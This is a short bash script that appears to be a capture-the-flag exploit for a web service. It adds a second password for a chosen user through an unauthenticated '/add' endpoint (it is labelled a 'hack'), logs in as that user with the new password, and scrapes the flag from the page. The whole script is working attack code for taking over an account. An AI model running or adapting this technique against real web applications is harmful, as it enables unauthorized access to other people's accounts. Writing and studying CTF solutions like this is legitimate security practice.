#!/bin/bash
set -e
if [ -z "$3" ]; then
echo "Usage: $(basename $0) PROTO HOST USER"
exit 1
fi
if [ "$1" != "http" ] && [ "$1" != "https" ]; then
echo "Error: invalid PROTO value. Choose one of: http, https"
exit 1
fi
PROTO="$1"
HOST="$2"
USER="$3"
PASSWORD=$(cat /dev/urandom | tr -dc A-Za-z0-9 | head -c 13)
COOKIE=$(cat /dev/urandom | tr -dc A-Za-z0-9 | head -c 32)
echo "Adding alternative password (hack) ..."
curl $PROTO://$HOST/add -d "address=http://some.site/&user=$USER&password=$PASSWORD" --cookie "ctf=$COOKIE"
echo "Added alternative password $PASSWORD for user $USER"
echo "Logging in as $USER ..."
curl $PROTO://$HOST/ -d "user=$USER&password=$PASSWORD&login=Login" -c ./cookies.txt
echo "Login success"
echo "Getting flag ..."
curl -s $PROTO://$HOST/ -b ./cookies.txt | grep "<tr>" -A4
echo "Get success"